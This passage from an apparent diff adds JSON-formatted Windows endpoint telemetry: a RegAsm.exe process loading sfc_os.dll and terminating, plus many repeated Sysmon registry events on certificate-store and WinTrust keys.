"RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868550000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "subtype": "terminate", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + 